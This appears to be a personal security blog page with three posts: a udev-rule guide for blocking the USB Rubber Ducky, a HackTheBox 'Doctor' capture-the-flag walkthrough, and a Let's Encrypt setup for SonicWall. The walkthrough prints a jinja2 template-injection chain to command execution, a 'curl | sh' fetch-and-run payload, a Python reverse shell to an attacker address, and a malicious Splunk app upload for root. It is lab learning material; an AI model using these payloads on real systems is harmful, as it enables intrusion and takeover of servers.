Blocking USB Rubber Ducky Attacks

And other badusb mitigation with udev rules and Group Policy

I recently had the pleasure and good fortune to work with a small group of my peers in exploring the HAK5 USB Rubber Ducky as a part of the RITSEC mentorship group. We all approached the project from different angles, and as a result we learned a lot about how to perform attacks, different attacks that were possible, and some possible mitigations. Please check out Olivia Gallucci’s blog (January 29, 2021: RITSEC Hak5 Rubber Ducky Research Presentation) if you would like to see what the group worked on as a whole.

This post is going to focus mainly on my own research as part of the team and what I discovered in regard to blocking the USB Rubber Ducky. The method can easily be expanded to mitigate other BadUSB devices as well. I will start by talking about the USB protocol itself and how that led me to the methods I came up with. If you would like to skip the background information, scroll down a bit to find the actual blocking methods.

The USB Protocol

The USB protocol is essentially the agreed-upon language that USB devices and hosts use to communicate and set up a connection. This is what allows new devices to be connected and accurately recognized for what they are. At a high level, when a device is plugged into a host, the host will see that something is now connected and query the new device for its USB descriptors. Now there are a lot of USB descriptors defined within the protocol, but we do not need to go into all of them to get a general understanding of what takes place and how the USB Rubber Ducky abuses the process.

There are three main descriptors that we will want to become familiar with: idProduct, idVendor, and bInterfaceClass. As you might expect, the idProduct and idVendor descriptors are used to identify the manufacturer and specific device that has been connected. This is not used by the host beyond labeling purposes in most cases. bInterfaceClass is used to identify what type of device was just plugged in. There are many classes, and a complete list can be found on the official USB Implementers Forum website, but for now we are concerned with only two: 0x08, which defines a device as USB mass storage, and 0x03, which defines a device as a Human Interface Device (HID).

Usually when a USB device is plugged in, it will correctly identify itself as what it really is. If it does not do so, the device will not work as intended. For example, if a USB storage device sends a bInterfaceClass descriptor which identifies itself as a printer, it will not show up as a USB drive that users can save files to. Because most manufacturers want to make devices that actually work, it is in their best interest to make sure their devices identify themselves correctly. A typical process for a USB drive can be seen in the images below:

The device is plugged in, and the host makes a request for the descriptors of that device.

The device responds, and here we can see the idVendor and idProduct descriptors being exchanged. The host then requests the device’s configuration descriptors, which will be used to define the capabilities of the device.

There is a lot of information exchanged to ensure that the device gets everything it needs from the host, but we are specifically interested in the highlighted line. This is a well behaved USB drive, and it identifies itself correctly using bInterfaceClass code 0x08. The host now knows that this is a mass storage device, and it can handle mounting and file transfers accordingly.

The USB Rubber Ducky takes advantage of the trust that the host has for the descriptors sent by the USB device. As mentioned before, the only thing that prevents a device from misrepresenting itself is the manufacturer’s desire to produce working devices, and in the case of the Rubber Ducky the manufacturer intentionally programmed the device to misidentify itself as an HID.

The capture shown above is from one of the ducky devices I used to do my testing. We can see that the bInterfaceClass code is set to 0x03, which will cause the host to see this as an HID, in this case a keyboard. So despite the fact that what the ducky actually contains is a micro-SD card, the host will see keyboard input and treat it as if it were any other keyboard. Now the attacker can achieve anything that would be possible while actually using a keyboard, but at much greater speeds than humanly possible. This can present an issue for organizations and individuals who are security conscious. It has long been known that locking down USB mass storage devices can improve the security of a system, but we can’t very well go around blocking keyboards. That would prevent legitimate users from doing any work and create an administrative overhead nightmare anytime someone needed a keyboard replacement.

So what can we do about that? The answer is fairly straightforward: blacklist rather than whitelist. There are significantly fewer devices that can be used in these types of attacks than there are USB keyboards in legitimate use. If we can block just one specific device, we can prevent a large number of attacks. Luckily, the USB protocol requires the exchange of identification descriptors before anything else, so we have an opportunity to lock out the bad USBs.

Blocking USB with udev rules

On Linux systems using kernel 2.6 or later, we have a device manager called udev which will allow us to create specific rules to handle how certain USB devices are treated and configured when they are connected to the host. In many cases this will be used for tasks such as adding a label to a certain device, or perhaps mounting a drive into a specific mount point.

udev can dynamically apply the configuration specified in the rules that are created, which makes it the perfect tool for what we want to achieve. Particularly because this dynamic configuration can be done based on the idVendor and idProduct USB descriptors that were discussed earlier. This allows us to target only the devices that we want to target without impacting anything else.

I will not be going far into everything that udev can do, nor how to create new custom rules. If you are interested in learning more about that topic, I recommend starting at the Debian Wiki article about udev.

All that needs to be done is the creation of a new udev rule. This is achieved by creating a new file in the /etc/udev/rules.d directory (requires root privileges) and saving the desired configuration into that file. We only need one line to block a device:

# Atmel chip-based Hak5 USB Rubber Ducky should be disabled
SUBSYSTEM=="usb", ATTRS{idVendor}=="03eb", ATTRS{idProduct}=="2401", ATTR{authorized}="0"

A quick rundown of what this will do: if a device is connected to the “usb” subsystem with idVendor matching “03eb” and idProduct matching “2401”, the “authorized” attribute will be set to zero. Devices are given an authorized value of one by default, so by making this change we remove authorization and effectively disable the device.

In my testing and research, I found that all of the USB Rubber Duckies that I had access to actually share a common Vendor and Product ID. If you have a device that you want to block and you do not know the ID descriptors, you can find them fairly easily using the lsusb command. In this way you could expand the rule shown above to block any other devices you want to.

Format is Vendor:Product
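As a quick sketch, the rule line itself can be generated for whatever vendor:product pair lsusb reports. The IDs below are the Atmel ones from the rule above, and the rules file name in the comment is just an example:

```python
# Build a udev blacklist rule for a given vendor:product pair.
# The IDs here are the Atmel ones used above; substitute the
# values that `lsusb` reports for the device you want to block.
vendor, product = "03eb", "2401"

rule = (
    f'SUBSYSTEM=="usb", ATTRS{{idVendor}}=="{vendor}", '
    f'ATTRS{{idProduct}}=="{product}", ATTR{{authorized}}="0"'
)
print(rule)

# As root, save the line into a rules file and reload udev, e.g.:
#   /etc/udev/rules.d/99-block-badusb.rules
#   udevadm control --reload-rules
```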

I created a small script to automate the process of adding the rule and restarting udev to activate it, which you can download from my GitHub:

Blocking USB with Group Policy

More details coming soon! I am still working on building my local domain so I can get proper screenshots for the content. In the meantime, here is the documentation that kicked off the Windows side of this project:

HackTheBox – Doctor – Walkthrough

Doctor is a relatively new machine by egotisticalSW on HackTheBox, released about three months before the time of writing. It is an immensely fun and informative challenge, with some very interesting techniques required to reach the end. It is rated as ‘easy’, though the user ratings tend more towards medium, which honestly feels more accurate. I highly recommend that you give it a try on your own before reading this article; I am sure you will learn a lot and enjoy it thoroughly.


This challenge begins as most good challenges do: enumeration. Pulling out the trusty tool called nmap, we get our first look at what services are running on the machine.

NMAP scan results

There are three open ports, with SSH running on 22, and web services running on both 80 and 8089. We will start with exploring the web service on port 80.

Port 80 website capture

It looks like a fairly stock website. No login forms to be found, and nothing to interact with. Gobuster didn’t find anything interesting either, only returning the directories containing images, css, etc. Fortunately the web service on port 8089 has more going on.

Port 8089 web site capture

The RPC link is not useful. Per Splunk documentation, it is only in place for backward compatibility and no longer provides any functionality.

Static is a dead link, only returning a 404.

Services and ServicesNS are more interesting, presenting an HTTP Basic Authentication prompt for the realm ‘/splunk’.

Splunk HTTP Basic Auth

At this point it seems we have reached somewhat of a dead end. The site on port 80 isn’t interesting, and we are locked out of Splunk. So, what next?

Turns out, something on the doctors website was overlooked:

Email domain

So far we have been using the IP address to access the web server, which means that when we make the HTTP GET request for this page, the Host field of the HTTP header contains that IP.

HTTP Request IP Host Header

If the web server is configured with a vhost for the doctors.htb domain, we might find some new material.

HTTP Request Domain Host Header

This can be achieved either by modifying your local hosts file or, in my case, by adding an entry to my local DNS server. Once that was in place, we can browse to http://doctors.htb rather than the bare IP.
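For the hosts file route, a single line on the attacking machine does the trick (the IP shown is a placeholder; use your target’s address):

```
# /etc/hosts on the attacking machine (replace with the target's IP)
10.10.10.209    doctors.htb
```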

Sure enough, there is another page for us to work with! And this one looks like it will be much more promising.

Secure Messaging Login Page

Naturally, the first thing that I tried was some common weak credentials. I made an assumption that there would likely be an account called admin, so using ‘admin@doctors.htb’ as the email I tried some passwords like admin, administrator, adminadmin, password, password123, etc.

Sometimes you get really lucky and that will be all it takes, but there was no such luck.

Failed Login

Abandoning that tactic, and not wanting to resort to brute force, I started to explore some more options.

Immediately apparent on the page are the ‘Forgot Password?’ and ‘Sign Up Now’ links, but before following through on those I decided to take a glance at the page source. Sometimes there is interesting JavaScript, or perhaps a comment that shouldn’t have been allowed into production.

Comments revealing too much

So what do we have at /archive?

Nothing here?

Huh… well that is certainly beta…

Nothing much in the source either. This really does look like nothing has been implemented here yet.

Nothing in the source either

Let’s check out the reset password functionality. Maybe we can reset admin’s password to something we know.

No resets today

That’s disappointing. Onto registration then!

User registration

Throwing together some simple account details, we are in fact able to register an account.

When we log in, we are greeted with an interesting message:

tick tock

Okay, so we have twenty minutes to explore before we have to re-register. A little annoying, but workable.

Clicking around through the various menus and pages does not reveal much. There is a basic post from an admin account, but no real useful information. Are we stuck again?

Of course not! I’ll cut out some of the details for the sake of time, but there are many options to explore. Given that we now have the ability to make new posts, the first thing I looked into was whether or not there was input sanitization. Turns out there was; I was not able to get any JS or other code execution through the new post functions.

I then turned to possible SQL injection on the login page. Thanks to the post that was found from the admin user, we know that there is at least one other user account that we may be able to get into. Unfortunately, SQLi proved fruitless as well. It was at this point that I took a step back, made a sandwich, and did the dishes. It can really help to step away from the problem for a bit, and I had been trying different ideas for several hours by now.

It was as I was putting some dishes away that I realized that I had not actually confirmed what type of web server I was working with. Knowing that piece of information can really help to guide what tactics we explore.

I came back to the Secure Message Service and opened up the firefox dev tools once more. Inspecting the HTTP headers for the server response, I saw this:

Back-end server type

This is good! Werkzeug is commonly used by Python web frameworks such as Django and Flask, so we have a direction for investigation. From some prior experience I knew that these Python web frameworks make use of templates to generate HTML content, and that in some cases these templates are not securely written. These insecurities can lead to Server Side Template Injection, or SSTI. If you haven’t heard of that before, I highly recommend taking an hour or so to read a little about it. It can be a very powerful method for information exposure and in some cases even remote code execution.

Now we just need to figure out if there is anything we can inject, and we need to get information about what template engine is being used. There are several different template engines; jinja2 is the default in Flask (Django ships its own similar engine), but it could also be Twig or another alternative. There are some simple tests that can be used to determine which template engine is in play. I like using this one when I know the back-end is Python:

{{ 7*'7' }}

This one is nice because there will be different output depending on which template engine is being used. If jinja2 is being used, the output will be 7777777, whereas Twig will interpret that as a math operation and output 49. Either way, you will see that there is an opening for template injection, and you will know which template engine to write code for.
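To see why the two engines disagree, run the expression in plain Python, which is what jinja2 evaluates it as:

```python
# jinja2 evaluates the template expression as Python, where
# multiplying a string repeats it; Twig (PHP) coerces '7' to a
# number and multiplies instead.
print(7 * '7')   # string repetition: 7777777
print(7 * 7)     # numeric multiplication: 49
```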

There are many more, and I highly recommend taking a look at the PayloadsAllTheThings SSTI page for more information about the different tests that can be done.

Once again I am drawn to two parts of the message system: the login and the new post method. The login page doesn’t give us output containing the input we provided, so starting with the new post method seems like a good idea.

SSTI Tests

Unfortunately, the results are not promising. The input is likely being escaped, so that the template format is not being recognized as code to be executed. Once again, I spent quite some time trying out new things and poking around. It was getting towards the end of the day when I randomly decided to look at the archive page once more.

The page itself was still blank, but the source code showed something interesting:


It had worked!! The title of the post is injectable!

And based on the output it would appear that the template engine is in fact jinja2. Finally some progress!

Now there are a few routes that we can go from here. As mentioned earlier, it is possible to expose data from the server through this injection, but what I really want to try for is a shell. This is going to require some investigation, because not all Python environments are the same. Some will have functions available that others may not, so we will need to get the lay of the land here. To do this, we will take advantage of the Python Method Resolution Order, or MRO. I won’t be explaining what that is in this post, but if you want to read more about it there is some very good information here:

Now, let’s begin to craft our code. The first thing we want to do is see what functions are available to us. I will start with the most basic steps and build up from there.

{{ ''.__class__.__mro__ }}

This is an empty string (two single quotes), and we are calling the __mro__ attribute of the class which the string type belongs to.
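If you want to see what this returns before burning one of your twenty-minute sessions, the same expression runs in any local Python interpreter:

```python
# The MRO of str is a tuple: (str, object)
mro = ''.__class__.__mro__
print(mro)

# Index 1 is the base object class we will pivot through next
print(mro[1] is object)
```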

Refreshing the archive page source, we see the following:

We used the string (str) class to obtain this information, so we will now navigate up the class hierarchy into the object class. The MRO is a tuple, and Python is zero-indexed, so we can provide the index of 1 to reach that second element. We then need to view the subclasses of ‘object’.

{{ ''.__class__.__mro__[1].__subclasses__() }}

The output of this injection is really quite long. It contains all of the classes which are subclasses of object, and as you can imagine there are many. I specifically want to find Popen, as it will allow me to execute commands directly on the server itself. So a quick Ctrl+F for popen reveals:

We have it! Not on its own, but from within the subprocess module. That is fine though. Now we just need to find the index of this class so we can call it. This part is a bit of trial and error using slicing. To start with, I used a starting index of 200.

{{ ''.__class__.__mro__[1].__subclasses__()[200:] }}

This will cut out the first 200 elements in the list and only show what comes after. Do another Ctrl+F to see if Popen is still present. If it is, we need to increase the starting index. If it is not in the output, we sliced it out and need to use a smaller index. Going through a few iterations of this, I found that the index for subprocess.Popen in this environment was 407. It will likely be different in other environments, so be patient and just work through it.
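As an aside, if you can test locally (or spare one extra injection), the slicing game can be skipped by locating the index with enumerate. Note that subprocess must already be imported somewhere in the target process for Popen to appear in the list at all, which it was here:

```python
import subprocess  # ensures Popen is loaded as a subclass of object

subs = ''.__class__.__mro__[1].__subclasses__()
idx = next(i for i, c in enumerate(subs) if c.__name__ == 'Popen')
print(idx)  # the index varies per environment (407 on this target)
```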

Now that the tedious work of finding that index is complete, we can start executing some code. To start with, just to verify that this was actually going to get results, I ran the ‘id’ command:

{{ ''.__class__.__mro__[1].__subclasses__()[407]('id', shell=True, stdout=-1).communicate() }}
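The stdout=-1 in the payload is just the literal value of subprocess.PIPE, which keeps the payload from having to name the subprocess module. The local equivalent of the injected call looks like this:

```python
import subprocess

# -1 is the numeric value of subprocess.PIPE
out, err = subprocess.Popen('echo injected', shell=True,
                            stdout=-1).communicate()
print(out)  # captured stdout as bytes; err is None (not piped)
```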

We get output as if we were at a shell directly. On top of that, we now know that code will be executed as a user called web. Based on the uid, this is a standard user account, not a service account. Now onto obtaining a more interactive shell. I opted to use a curl shell, because other methods were proving difficult to type out while maintaining the proper quote encapsulation. This method is pretty straightforward: it involves using curl to pipe commands from a remote web server through a local shell instance. I used a modified version of this reverse shell by Luke Childs: My target did not have public internet access, so I hosted the code on my attacking machine. That allowed me to make a curl request from the target using Popen, which would grab the code from the attacking machine and run it through sh. With a netcat listener open, I ran this code:

{{ ''.__class__.__mro__[1].__subclasses__()[407]('curl | sh', shell=True, stdout=-1).communicate() }}

Refreshing the archive source once more, it hangs. This is always a good sign when executing a remote shell this way. I checked on netcat and was greeted by one of our favorite sights:


Some basic shell stabilization and we are off to the races!

Privilege Escalation – User

Now that we have a shell, it is time to get the lay of the land. Looking around, it becomes clear that we are not the correct user. Currently we have access as web, however only shaun has access to the user.txt file which contains the flag we need.

notice the permissions on user.txt

One of the first things I do when I have access to a new system is run an enumeration script. There are a number of great scripts out there, but I tend to go with LinEnum or LinPEAS in most cases. I used LinPEAS this time, for no reason other than I decided to on a whim.

LinPEAS provides TONS of great information. More than we can properly go over here, but I would recommend running it on your own system to get a feel for what it can reveal.

I spent several minutes reading through the output of the script. I have found that it is usually beneficial to take the time to read through all the output right away, rather than jumping to the first possible escalation technique you see. Sometimes there are other, easier ways further down. That policy served me well in this case. Down towards the bottom of the script output, I found this little nugget of information:

betrayed by the logs

Do you see it? The first apache2 log entry.

It looks like someone accidentally entered a password where the email is supposed to go in the password reset form. Maybe we can take advantage of that, after all, password reuse is very common…

And just like that, we have access to the user account we need!

Next, we root.

Privilege Escalation – Root

First things first, check the obvious:

no sudo for you

No dice. We already have the LinPEAS output from earlier, and looking through it again does not reveal any clear paths to root. No cronjobs or obviously misconfigured permissions. No strange SUID files or capabilities.

One item did catch my eye after a few more minutes of reviewing the data:

splunk process running as root

Splunk, which we explored briefly in the beginning, is running as root. And we now have credentials, so we should be able to get past the HTTP authentication that stopped us before. Perhaps we can leverage this to run our own code, using Splunk, as root…

Navigating back to the Splunk page, we are indeed able to log in using shaun’s credentials. Once authenticated, there are many more options than were previously available:

Now, we could just start clicking around (and I admit that I did), but really we need some documentation on what these all do. Some light googling reveals that these links are in fact Splunk’s REST API. The documentation revealed some interesting functionality, specifically in /apps/local. It would appear that a POST request to that endpoint would allow us to install a new app, as long as the user account we are logged in as has appropriate permissions.

According to the reference for the apps/local endpoint, we need install_apps AND edit_local_apps, OR admin_all_objects permissions. We can find our permissions using the /admin/users endpoint, which confirmed that we do indeed have the permissions necessary:

Now we need to create an app that Splunk can use, so we can execute code.

Splunk’s documentation provides some details on what is needed. Essentially, we create a directory for our new app, and create the bin and default directories within it. Our code goes in ./bin, and there is some information that Splunk needs in ./default. The file tree will look like this:

/new_splunk_app
    \__ /bin
    \__ /default

For the code itself, we will just use the common python reverse shell. Nothing too special:

import sys,socket,os,pty
s=socket.socket(); s.connect(("ATTACKER_IP",4444))  # placeholder listener address/port
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

The inputs.conf file in the /default directory is what Splunk will use to keep track of the process that is spawned from the app. It helps to prevent duplicate processes, and will tell Splunk how often to restart the process if it dies.

# the stanza names the script to run from ./bin (path here is illustrative)
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = HTB

Finally, we need to wrap all these files and folders up into an archive. Splunk can use .tar, .tgz, and .spl files to install new apps. We can use the following to archive this as needed:

tar -czvf new_splunk_app.tar.gz ./new_splunk_app

Lastly, we need to actually upload the app that we just created. This can be done using curl to create the POST request. Reading through the documentation, there are examples of how the POST request should be formatted, and the endpoint reference guide indicates which flags are required.

The end result will look like this:

curl -k -X POST -u shaun:Guitar123 https://doctors.htb:8089/services/apps/local \
-d filename=True \
-d name= \
-d visible=True

Before we run the command, we need to start up a netcat session listening on the port we specified in the python reverse shell. With that in place, we can execute.

We get some good XML output indicating that the command was accepted by Splunk!

If we take a look at the apps/local endpoint now, we can find the app that we just installed.

The name will be different depending on what you called your files.

Now, for the moment we have all been waiting for…


Thank you for reading my walk through! I hope that you were able to learn some new techniques and get some insight into the path that I followed while attacking this machine. Special thanks to egotisticalSW for creating this challenge, and to HackTheBox for providing the platform.

I’ll see you for the next one. Happy Hacking!

Securing SonicWall Management and SSL-VPN with Let’s Encrypt Certificates

Let’s Encrypt has done a beautiful thing. They have made security certificates for use with SSL/TLS accessible to everyone, for FREE. Truly, truly awesome. They also have very convenient integrations with many types of servers, making it not only convenient but downright easy to obtain and use the certificates.

Unfortunately, SonicWall’s UTM firewalls do not make use of the various options for integration, and for those of us that crave proper security this can be a bit of a letdown. The good news is, with a little extra legwork, we can use Let’s Encrypt to secure our communications for both web management and the SSL-VPN.

There are a few things that need to be in place in order to achieve this:
1) We need a valid public domain
2) We need a DNS ‘A’ record that resolves to the public IP address of the SonicWall
3) We need the ability to add TXT records to our public DNS records
4) We need administrative access to the SonicWall
5) We need access to a Unix or Unix-like workstation, server, or similar device and permissions to use sudo to elevate privileges (please don’t log in as root, that’s not good practice)

I am not going to go into the process of obtaining a domain nor how to change DNS records; there are plenty of great tutorials out there already. Instead, we will focus solely on what we need to do for the SonicWall and Let’s Encrypt. This has been tested on firmware versions and up, most recently on. That said, I am sure that this same process will work on Gen 5 units that are using the 5.9.x.x line of firmware (it had better be, or else you need to update!), but the menus will look different.

Enough prelude, let’s encrypt! (Sorry, that was terrible)

The first thing we need to do is generate a Certificate Signing Request (CSR) on the SonicWall. To do so, log in and navigate to Manage > Appliance > Certificates. At the bottom of the list of default trusted certificates, you will find the New Signing Request button. Hit that and you are presented with the CSR form.

SonicWall Certificate Signing Request form

Get that all filled out, and make sure that the common name you enter matches the domain name you have configured to resolve to your SonicWall’s WAN IP. I strongly recommend that you do not use a Signature Algorithm less than SHA256, and the Subject Key Size/Curve should be no smaller than 2048 bits. Once you are ready, click generate at the bottom of the window. You will see a new entry at the top of the trusted certificate list. It can take a moment to generate the key (especially if you went bigger than 2048) so readjust your hat and then hit refresh in your browser.

You will know it is ready to go when the “Type” column says “Pending Request.” Follow the row to the far right of the page and click the download icon to download the .p10 file we will use with Let’s Encrypt to get this request signed. Click “Export” on the pop-up, and save this file somewhere secure.

New entry created by generating the certificate signing request.

That is all for the SonicWall at this point; now we need to get this certificate signed and official. To do that, we will be using certbot, a tool published by the EFF that will allow us to submit the CSR for signing. I chose to do this on Ubuntu 18.04, but you can use your Unix or Unix-like system of choice. Make sure you can get to the .p10 file that was created in the last steps.

To install certbot onto Ubuntu, run the following:

sudo apt install certbot -y

An issue that many run into when trying this process is that the default way certbot wants to verify ownership of the domain and server is by either:
1) starting up a standalone webserver that it can install the certificate to
2) placing files into the common webroot directory for authentication.
Following that, certbot wants to be entirely too helpful, and will actually try to install and configure the certificate for use on the server you are running certbot on. This is a problem, seeing as the SonicWall can do none of these things.

Never fear, I read the certbot manual so you don’t need to.

We are going to run certbot in ‘certonly’ mode, which bypasses the attempted installation. In addition to that, we are going to use ACME validation through a DNS TXT record, rather than using a web server. Lastly, we already have a certificate signing request, so we can tell certbot to use it rather than generating a new one on the Ubuntu machine we are using. The command will look like this:

sudo certbot certonly --manual --preferred-challenges dns --csr [PATH TO YOUR .P10]

Hit enter and we are off! The --manual flag means that this will run in interactive mode, so there are a few things that will need to be filled in. Provide an email address that will be notified when certificate renewal is coming up, and agree to the terms of service.

There are a few questions that follow, answer them according to your preferences. After those questions, we are presented with the name of the TXT record we need to deploy, as well as the hash we will insert in that TXT record for verification. Create the TXT record and give it a few moments to propagate. There are a few good DNS propagation checkers available, try one of those and just wait until most of the major servers reflect the change.
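The deployed record will look something like the following (the name and value here are made up for illustration; certbot prints the real ones for your domain):

```
_acme-challenge.vpn.example.com.  300  IN  TXT  "5GFgEqWd-example-validation-hash"
```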

As long as you waited long enough for DNS propagation, you should see the success message shortly.

Take note of the expiration date; Let’s Encrypt certificates are not very long-lived. It is recommended to have a reminder of some sort to renew the certificate a week or two before it actually expires, so you don’t encounter a lapse in availability. Unfortunately, as of writing this, there is no way to renew the certificate on a completely automated basis, mostly because I don’t have an automated way to generate a new CSR on the SonicWall nor a way to automatically upload the signed certificate. Still, this was free…

Anyway, we still need to upload this signed certificate to the SonicWall so we can start using it. Take the xxxx_cert.pem file that was generated, as well as the xxxx_chain.pem files that go with it. Log back into the SonicWall (you did log out earlier, right? I mean, that is good security practice after all… 😉 ) and click on the icon that looks like a server with a green arrow; it will be on the far right, next to the download button.

You will be prompted to select the .pem file that was generated by certbot. Click browse to locate the file, and then hit upload.

We are nearly done! You may notice that in the “Validated” column, this certificate is listed as not validated.

This is because the Let’s Encrypt Certificate Authority root certificates are not trusted by the SonicWall UTM by default. We will need to upload the requisite certificates to complete the chain of trust. That is where those xxxx_chain.pem files come in. Scroll down to the bottom of the page and click the import button. Select the radio button for uploading a CA Certificate, and browse to the xxxx_chain.pem files.

Once you have them all uploaded, you will notice that the Validated status now says “Yes”. If for some reason you are unable to upload those files, or maybe something happened and they were never generated, you can obtain them from the following locations:

Save those files as .pem and proceed with the import as detailed above.

Congratulations! You have successfully obtained and uploaded a valid certificate for your SonicWall, from Let’s Encrypt, for the best price possible: free. Now you can use the certificate to secure WAN management and the SSL-VPN service, or really any other place you may want to use it.